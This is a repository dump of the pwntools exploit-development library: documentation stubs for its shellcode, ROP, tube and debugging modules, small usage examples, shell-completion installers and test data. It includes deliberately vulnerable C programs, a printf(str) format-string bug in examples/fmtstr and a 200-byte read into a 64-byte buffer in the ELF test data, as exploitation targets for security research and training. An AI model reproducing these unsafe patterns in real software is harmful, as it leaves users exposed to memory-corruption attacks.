-------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.rop.srop import * 4 | 5 | from pwnlib import constants 6 | from pwnlib import shellcraft 7 | from pwnlib.elf import ELF 8 | from pwnlib.tubes.process import process 9 | 10 | import doctest 11 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 12 | 13 | :mod:`pwnlib.rop.srop` --- Sigreturn Oriented Programming 14 | ========================================================== 15 | 16 | .. automodule:: pwnlib.rop.srop 17 | :members: 18 | -------------------------------------------------------------------------------- /docs/source/runner.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.runner import * 4 | from pwnlib.asm import asm 5 | 6 | # TODO: Remove global POSIX flag 7 | import doctest 8 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 9 | 10 | :mod:`pwnlib.runner` --- Running Shellcode 11 | =========================================== 12 | 13 | .. automodule:: pwnlib.runner 14 | :members: 15 | -------------------------------------------------------------------------------- /docs/source/shellcraft.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib import shellcraft 4 | 5 | # TODO: Remove global POSIX flag 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 8 | 9 | :mod:`pwnlib.shellcraft` --- Shellcode generation 10 | ================================================= 11 | 12 | .. automodule:: pwnlib.shellcraft 13 | 14 | .. TODO: 15 | 16 | Write a guide to adding more shellcode. 17 | 18 | Submodules 19 | ---------- 20 | 21 | .. toctree:: 22 | :glob: 23 | 24 | shellcraft/* 25 | -------------------------------------------------------------------------------- /docs/source/shellcraft/aarch64.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.clear(arch='aarch64') 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 8 | 9 | :mod:`pwnlib.shellcraft.aarch64` --- Shellcode for AArch64 10 | =========================================================== 11 | 12 | :mod:`pwnlib.shellcraft.aarch64` 13 | -------------------------------- 14 | 15 | .. automodule:: pwnlib.shellcraft.aarch64 16 | :members: 17 | 18 | :mod:`pwnlib.shellcraft.aarch64.linux` 19 | -------------------------------------- 20 | 21 | .. automodule:: pwnlib.shellcraft.aarch64.linux 22 | :members: 23 | -------------------------------------------------------------------------------- /docs/source/shellcraft/arm.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.clear(arch='arm') 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 8 | 9 | :mod:`pwnlib.shellcraft.arm` --- Shellcode for ARM 10 | =========================================================== 11 | 12 | :mod:`pwnlib.shellcraft.arm` 13 | ----------------------------- 14 | 15 | .. automodule:: pwnlib.shellcraft.arm 16 | :members: 17 | 18 | :mod:`pwnlib.shellcraft.arm.linux` 19 | ----------------------------------- 20 | 21 | .. automodule:: pwnlib.shellcraft.arm.linux 22 | :members: 23 | -------------------------------------------------------------------------------- /docs/source/shellcraft/common.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.shellcraft.common` --- Shellcode common to all architecture 2 | ======================================================================== 3 | 4 | .. automodule:: pwnlib.shellcraft.common 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/shellcraft/loongarch64.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.clear(arch='loongarch64') 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 8 | 9 | :mod:`pwnlib.shellcraft.loongarch64` --- Shellcode for LoongArch64 10 | ================================================================== 11 | 12 | :mod:`pwnlib.shellcraft.loongarch64` 13 | ------------------------------------ 14 | 15 | .. automodule:: pwnlib.shellcraft.loongarch64 16 | :members: 17 | 18 | :mod:`pwnlib.shellcraft.loongarch64.linux` 19 | ------------------------------------------ 20 | 21 | .. automodule:: pwnlib.shellcraft.loongarch64.linux 22 | :members: 23 | -------------------------------------------------------------------------------- /docs/source/shellcraft/riscv64.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.clear(arch='riscv64') 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 8 | 9 | :mod:`pwnlib.shellcraft.riscv64` --- Shellcode for RISCV64 10 | ========================================================== 11 | 12 | :mod:`pwnlib.shellcraft.riscv64` 13 | -------------------------------- 14 | 15 | .. automodule:: pwnlib.shellcraft.riscv64 16 | :members: 17 | 18 | :mod:`pwnlib.shellcraft.riscv64.linux` 19 | -------------------------------------- 20 | 21 | .. automodule:: pwnlib.shellcraft.riscv64.linux 22 | :members: 23 | -------------------------------------------------------------------------------- /docs/source/shellcraft/thumb.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.clear(arch='thumb') 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 8 | 9 | :mod:`pwnlib.shellcraft.thumb` --- Shellcode for Thumb Mode 10 | =========================================================== 11 | 12 | :mod:`pwnlib.shellcraft.thumb` 13 | ------------------------------- 14 | 15 | .. automodule:: pwnlib.shellcraft.thumb 16 | :members: 17 | 18 | :mod:`pwnlib.shellcraft.thumb.linux` 19 | --------------------------------------- 20 | 21 | .. automodule:: pwnlib.shellcraft.thumb.linux 22 | :members: 23 | -------------------------------------------------------------------------------- /docs/source/term.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.term` --- Terminal handling 2 | ======================================== 3 | 4 | .. automodule:: pwnlib.term 5 | :members: 6 | 7 | Term Modules 8 | ------------------- 9 | 10 | .. toctree:: 11 | term/readline 12 | -------------------------------------------------------------------------------- /docs/source/term/readline.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.term.readline import * 4 | import io 5 | 6 | :mod:`pwnlib.term.readline` --- Terminal nice readline 7 | ====================================================== 8 | 9 | .. automodule:: pwnlib.term.readline 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/testexample.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | import os 4 | from pwnlib.testexample import add 5 | 6 | :mod:`pwnlib.testexample` --- Example Test Module 7 | ================================================== 8 | 9 | .. automodule:: pwnlib.testexample 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/timeout.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.context import context 4 | from pwnlib.timeout import Timeout 5 | import time 6 | 7 | :mod:`pwnlib.timeout` --- Timeout handling 8 | ============================================ 9 | 10 | .. automodule:: pwnlib.timeout 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/tubes.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | :mod:`pwnlib.tubes` --- Talking to the World! 6 | ============================================= 7 | 8 | .. automodule:: pwnlib.tubes 9 | 10 | 11 | Types of Tubes 12 | ------------------- 13 | 14 | .. toctree:: 15 | :maxdepth: 3 16 | :glob: 17 | 18 | tubes/* 19 | 20 | 21 | :mod:`pwnlib.tubes.tube` --- Common Functionality 22 | ------------------------------------------------- 23 | 24 | 25 | .. automodule:: pwnlib.tubes.tube 26 | 27 | .. autoclass:: pwnlib.tubes.tube.tube() 28 | :members: 29 | :exclude-members: recv_raw, send_raw, settimeout_raw, 30 | can_recv_raw, shutdown_raw, connected_raw, 31 | -------------------------------------------------------------------------------- /docs/source/tubes/buffer.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.tubes.buffer import * 4 | 5 | :mod:`pwnlib.tubes.buffer` --- buffer implementation for tubes 6 | ============================================================== 7 | 8 | .. automodule:: pwnlib.tubes.buffer 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/tubes/processes.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | # TODO: Remove global POSIX flag 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 8 | 9 | :mod:`pwnlib.tubes.process` --- Processes 10 | =========================================================== 11 | 12 | .. automodule:: pwnlib.tubes.process 13 | 14 | .. autoclass:: pwnlib.tubes.process.process 15 | :members: 16 | :show-inheritance: 17 | -------------------------------------------------------------------------------- /docs/source/tubes/serial.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | # TODO: Remove global POSIX flag 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 8 | 9 | :mod:`pwnlib.tubes.serialtube` --- Serial Ports 10 | =========================================================== 11 | 12 | .. automodule:: pwnlib.tubes.serialtube 13 | 14 | .. autoclass:: pwnlib.tubes.serialtube.serialtube 15 | :members: 16 | -------------------------------------------------------------------------------- /docs/source/ui.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | import io 5 | 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 8 | 9 | :mod:`pwnlib.ui` --- Functions for user interaction 10 | =================================================== 11 | 12 | .. automodule:: pwnlib.ui 13 | :members: 14 | -------------------------------------------------------------------------------- /docs/source/update.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | from pwnlib.update import * 5 | 6 | :mod:`pwnlib.update` --- Updating Pwntools 7 | =================================================== 8 | 9 | .. automodule:: pwnlib.update 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/useragents.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.useragents import * 4 | 5 | :mod:`pwnlib.useragents` --- A database of useragent strings 6 | ============================================================ 7 | 8 | .. automodule:: pwnlib.useragents 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/util/crc.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.crc import * 4 | 5 | 6 | :mod:`pwnlib.util.crc` --- Calculating CRC-sums 7 | =============================================== 8 | 9 | .. automodule:: pwnlib.util.crc 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/util/cyclic.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | from pwnlib.util.cyclic import * 5 | 6 | 7 | :mod:`pwnlib.util.cyclic` --- Generation of unique sequences 8 | ============================================================ 9 | 10 | .. automodule:: pwnlib.util.cyclic 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/util/fiddling.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | from pwnlib.util.fiddling import * 5 | 6 | 7 | :mod:`pwnlib.util.fiddling` --- Utilities bit fiddling 8 | ====================================================== 9 | 10 | .. automodule:: pwnlib.util.fiddling 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/util/getdents.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.getdents import * 4 | from pwnlib.util.fiddling import unhex 5 | 6 | 7 | :mod:`pwnlib.util.getdents` --- Linux binary directory listing 8 | ============================================================== 9 | 10 | .. automodule:: pwnlib.util.getdents 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/util/hashes.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.util.hashes` --- Hashing functions 2 | =============================================== 3 | 4 | .. automodule:: pwnlib.util.hashes 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/util/lists.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.lists import * 4 | 5 | :mod:`pwnlib.util.lists` --- Operations on lists 6 | ================================================ 7 | 8 | .. automodule:: pwnlib.util.lists 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/util/misc.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pprint import pprint 4 | from pwnlib.util.misc import * 5 | import os, subprocess 6 | 7 | :mod:`pwnlib.util.misc` --- We could not fit it any other place 8 | =============================================================== 9 | 10 | .. automodule:: pwnlib.util.misc 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/util/net.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.net import * 4 | 5 | import doctest 6 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 7 | 8 | :mod:`pwnlib.util.net` --- Networking interfaces 9 | =================================================== 10 | 11 | .. automodule:: pwnlib.util.net 12 | :members: 13 | -------------------------------------------------------------------------------- /docs/source/util/packing.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.packing import * 4 | 5 | 6 | :mod:`pwnlib.util.packing` --- Packing and unpacking of strings 7 | =============================================================== 8 | 9 | .. automodule:: pwnlib.util.packing 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/util/proc.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.proc import * 4 | from pwnlib.tubes.process import process 5 | import os, sys 6 | 7 | import doctest 8 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 9 | 10 | 11 | :mod:`pwnlib.util.proc` --- Working with ``/proc/`` 12 | =================================================== 13 | 14 | .. automodule:: pwnlib.util.proc 15 | :members: 16 | -------------------------------------------------------------------------------- /docs/source/util/safeeval.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.util.safeeval import * 4 | _get_opcodes = pwnlib.util.safeeval._get_opcodes 5 | 6 | 7 | :mod:`pwnlib.util.safeeval` --- Safe evaluation of python code 8 | ============================================================== 9 | 10 | .. automodule:: pwnlib.util.safeeval 11 | :members: 12 | -------------------------------------------------------------------------------- /docs/source/util/sh_string.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | test = pwnlib.util.sh_string.test 5 | 6 | :mod:`pwnlib.util.sh_string` --- Shell Expansion is Hard 7 | =============================================================== 8 | 9 | .. automodule:: pwnlib.util.sh_string 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/util/web.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | import tempfile 4 | 5 | from pwnlib.context import context 6 | from pwnlib.util.web import * 7 | 8 | :mod:`pwnlib.util.web` --- Utilities for working with the WWW 9 | ============================================================= 10 | 11 | .. automodule:: pwnlib.util.web 12 | :members: 13 | -------------------------------------------------------------------------------- /docs/source/windbg.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | :mod:`pwnlib.windbg` --- Working with WinDbg 6 | ============================================ 7 | 8 | .. automodule:: pwnlib.windbg 9 | :members: -------------------------------------------------------------------------------- /examples/android.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | 3 | import gdb 4 | from pwn import adb, context 5 | 6 | # Tell pwntools that the target is an Android device 7 | context.os = "android" 8 | context.arch = "aarch64" # or 'arm' 9 | 10 | # Optionally, set the remote ADB server address 11 | context.adb_host = "172.16.110.1" 12 | 13 | # Wait for a device to become available 14 | print(adb.wait_for_device()) 15 | 16 | # Who am I? 17 | print(adb.process("id").recvall().strip()) 18 | 19 | # Interactive sessions! 20 | io = adb.shell() 21 | io.sendline("echo Hello, world; exit") 22 | print(io.recvall().replace("\r\n", "\n").strip()) 23 | 24 | # Debugging! 25 | gdb.debug("sh").interactive() 26 | -------------------------------------------------------------------------------- /examples/args.py: -------------------------------------------------------------------------------- 1 | """ 2 | When not in lib-mode (import `pwn` rather than `pwnlib`) we parse the 3 | commandline for variables definitions. A variable definition has the form:: 4 | 5 | = 6 | 7 | where ```` contains only uppercase letters, digits and underscores and 8 | doesn't start with a digit. 9 | 10 | Try running this example with:: 11 | 12 | $ python args.py RHOST=localhost RPORT=1337 13 | """ 14 | 15 | from pwn import * 16 | 17 | print(args['RHOST'] or 'RHOST is not set') 18 | print(args['RPORT'] or 'RPORT is not set') 19 | -------------------------------------------------------------------------------- /examples/asm.py: -------------------------------------------------------------------------------- 1 | """ 2 | Example showing the interface to `pwnlib.asm.asm` and `pwnlib.shellcraft`. 3 | """ 4 | 5 | from pwn import * 6 | 7 | context(arch='i386', os='linux') 8 | 9 | shellcode = shellcraft.i386_to_amd64() 10 | shellcode_asm = asm(shellcode) 11 | 12 | print(enhex(shellcode_asm)) 13 | print(disasm(shellcode_asm)) 14 | -------------------------------------------------------------------------------- /examples/attach.py: -------------------------------------------------------------------------------- 1 | """ 2 | Example showing `pwnlib.gdb.attach()` 3 | """ 4 | 5 | from pwn import * 6 | 7 | bash = process('/bin/bash') 8 | gdb.attach(bash, gdbscript = ''' 9 | p "hello from pwnlib" 10 | c 11 | ''') 12 | bash.interactive() 13 | -------------------------------------------------------------------------------- /examples/fmtstr/printf-loop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | while (1) { 6 | char str[256]; 7 | int n = read(STDIN_FILENO, str, sizeof(str) - 1); 8 | str[n] = '\0'; 9 | printf(str); 10 | printf("\n=try again=\n"); 11 | fflush(stdout); 12 | } 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /examples/fmtstr/printf-loop.native: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf-loop.native -------------------------------------------------------------------------------- /examples/fmtstr/printf-loop.native32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf-loop.native32 -------------------------------------------------------------------------------- /examples/fmtstr/printf.aarch64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.aarch64 -------------------------------------------------------------------------------- /examples/fmtstr/printf.arm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.arm -------------------------------------------------------------------------------- /examples/fmtstr/printf.mips: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.mips -------------------------------------------------------------------------------- /examples/fmtstr/printf.mips64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.mips64 -------------------------------------------------------------------------------- /examples/fmtstr/printf.mips64el: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.mips64el -------------------------------------------------------------------------------- /examples/fmtstr/printf.mipsel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.mipsel -------------------------------------------------------------------------------- /examples/fmtstr/printf.native: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.native -------------------------------------------------------------------------------- /examples/fmtstr/printf.native32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.native32 -------------------------------------------------------------------------------- /examples/fmtstr/printf.ppc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.ppc -------------------------------------------------------------------------------- /examples/fmtstr/printf.ppc64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.ppc64 -------------------------------------------------------------------------------- /examples/fmtstr/printf.sparc64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/examples/fmtstr/printf.sparc64 -------------------------------------------------------------------------------- /examples/indented.py: -------------------------------------------------------------------------------- 1 | """ 2 | When running in term-mode (import `pwn` rather than `pwnlib`, stdout is a TTY 3 | and not running in a REPL), we can do proper indentation where lines too long to 4 | fit on a screen are split into multiple individually indented lines. 5 | 6 | Too see the difference try running with:: 7 | 8 | $ python indented.py 9 | 10 | and 11 | 12 | $ python -i indented.py 13 | 14 | Also notice that `pause()` can react on any key when in `term_mode`. 15 | """ 16 | 17 | from pwn import * 18 | 19 | context.log_level = 'info' 20 | 21 | log.indented('A' * 100) 22 | log.indented('B' * 100) 23 | log.indented('C' * 100) 24 | 25 | pause() 26 | -------------------------------------------------------------------------------- /examples/listen_uroboros.py: -------------------------------------------------------------------------------- 1 | """ 2 | An example showing interconnection of sockets. This script will wait for three 3 | connections on port 1337, then connect them like a three-way Uroboros. 4 | """ 5 | 6 | from pwn import * 7 | 8 | cs = [listen(1337).wait_for_connection() for _ in range(3)] 9 | 10 | cs[0] << cs[1] << cs[2] << cs[0] 11 | 12 | cs[0].wait_for_close() 13 | cs[1].wait_for_close() 14 | cs[2].wait_for_close() 15 | -------------------------------------------------------------------------------- /examples/options.py: -------------------------------------------------------------------------------- 1 | """ 2 | Example showing `pwnlib.ui.options()` 3 | """ 4 | 5 | from pwn import * 6 | 7 | opts = [string.ascii_letters[x] for x in range(12)] 8 | print('You choose "%s"' % opts[options('Pick one:', opts)]) 9 | -------------------------------------------------------------------------------- /examples/port_forward.py: -------------------------------------------------------------------------------- 1 | """ 2 | A very simple port forwarder using `pwnlib.tubes.tube.connect_both()`. 3 | """ 4 | 5 | from pwn import * 6 | 7 | while True: 8 | listen(1337).wait_for_connection().connect_both(remote('google.com', 80)) 9 | 10 | # now point your browser (or curl(1)) to http://localhost:1337 11 | -------------------------------------------------------------------------------- /examples/remote.py: -------------------------------------------------------------------------------- 1 | """ 2 | Example showing how to use the remote class. 3 | """ 4 | 5 | from pwn import * 6 | 7 | sock = remote('127.0.0.1', 9001) 8 | 9 | print(sock.recvline()) 10 | sock.send('foo') 11 | sock.interactive() 12 | -------------------------------------------------------------------------------- /examples/remote_gdb_debugging.py: -------------------------------------------------------------------------------- 1 | """ 2 | Simple example showing how to use the remote 3 | gdb debugging features available in pwntools. 4 | """ 5 | 6 | import getpass 7 | 8 | from pwn import * 9 | 10 | s = ssh(getpass.getuser(), '127.0.0.1', port = 22, keyfile = "~/.ssh/id_rsa") 11 | c = gdb.ssh_gdb(s, '/bin/sh', gdbscript = ''' 12 | p/x $pc 13 | c''') 14 | 15 | c.sendline('ls -la') 16 | c.sendline('exit') 17 | print(c.recvall()) 18 | -------------------------------------------------------------------------------- /examples/spinners.py: -------------------------------------------------------------------------------- 1 | """ 2 | Just a lot of spinners! 3 | """ 4 | 5 | from pwn import * 6 | 7 | context.log_level = 0 8 | 9 | n = 1 10 | h = log.waitfor('spinners running', status = str(n)) 11 | 12 | hs = [] 13 | print('type "q" to quit') 14 | while True: 15 | s = str_input('> ').strip() 16 | if s == 'q': 17 | break 18 | hs.append(log.waitfor(s, status = 'running')) 19 | n += 1 20 | h.status(str(n)) 21 | 22 | h.success() 23 | 24 | for h in hs: 25 | h.failure() 26 | -------------------------------------------------------------------------------- /examples/splash.py: -------------------------------------------------------------------------------- 1 | """ 2 | "Easteregg" 3 | """ 4 | 5 | from pwn import * 6 | 7 | splash() 8 | 9 | h = log.waitfor("You wrote", status = "--") 10 | 11 | while True: 12 | l = str_input('> ').strip() 13 | h.status(l.upper()) 14 | -------------------------------------------------------------------------------- /examples/text.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Example showing how to use `pwnlib.term.text`. 3 | 4 | Try running with:: 5 | 6 | $ TERM=xterm python text.py 7 | 8 | and:: 9 | 10 | $ TERM=xterm-256color python text.py 11 | ''' 12 | from pwn import * 13 | 14 | s = 'hello from pwntools' 15 | print(text.black_on_green(s)) 16 | print(text.black_on_bright_green(s)) 17 | print(text.green_on_black(s)) 18 | print(text.bright_green_on_black(s)) 19 | print(text.bold_green_on_black(s)) 20 | -------------------------------------------------------------------------------- /examples/yesno.py: -------------------------------------------------------------------------------- 1 | """ 2 | Example showing `pwnlib.ui.yesno()` 3 | """ 4 | 5 | from pwn import * 6 | 7 | if ui.yesno('Do you like Pwntools?'): 8 | print(':D') 9 | else: 10 | print(':(') 11 | -------------------------------------------------------------------------------- /extra/bash_completion.d/README.md: -------------------------------------------------------------------------------- 1 | # Bash Completion 2 | 3 | To install the completion, add `. /path/to/bash_completion.d/pwn`to your e.g. `~/.bash_profile`. 4 | 5 | The `./install.sh` script attempts to do this for you automatically. 6 | 7 | ### Shellcraft Autocomplete 8 | 9 | The legacy autocompletion for `pwn shellcraft` is also available at `./shellcraft`. 10 | 11 | It is unsupported, and slow (runs `pwn shellcraft -l` every time your shell starts). 12 | 13 | -------------------------------------------------------------------------------- /extra/bash_completion.d/install.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | BASH_COMPLETION_DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd) 4 | 5 | if grep "$BASH_COMPLETION_DIR" ~/.bash_profile; then 6 | >&2 echo "Already installed" 7 | exit 8 | fi >/dev/null 9 | 10 | cat >> ~/.bash_profile < Syntax > Open All ... > Pwntools ...`. 20 | -------------------------------------------------------------------------------- /extra/textmate/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/extra/textmate/screenshot.png -------------------------------------------------------------------------------- /extra/zsh_completion/README.md: -------------------------------------------------------------------------------- 1 | # ZSH Completion 2 | 3 | To install the completion, copy `_pwn` to somewhere in your `$fpath`. 4 | 5 | The `./install.sh` script attempts to automate this, and advises an alternative method if that's unavailable. -------------------------------------------------------------------------------- /extra/zsh_completion/install.zsh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env zsh 2 | 3 | # Try to find a writable directory first, in reverse order 4 | for dir in "${(Oa)fpath[@]}"; do 5 | if [ -w "$dir" ]; then 6 | cp -f ${0:h}/_pwn "$dir" 7 | return 8 | fi 9 | done 10 | 11 | cat < 2 | void vuln(void){ 3 | char buf[64]; 4 | read(STDIN_FILENO, buf, 200); 5 | } 6 | int main(int argc, char** argv){ 7 | vuln(); 8 | } -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64 -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-big: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-big -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-big-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-big-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-big-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-big-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-big-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-big-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-aarch64-relro-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-aarch64-relro-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-big: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-big -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-big-pie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-big-pie -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-big-relro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/data/elf/test-arm-big-relro -------------------------------------------------------------------------------- /pwnlib/data/elf/test-arm-big-relro-pie: -------------------------------------------------------------------------------- 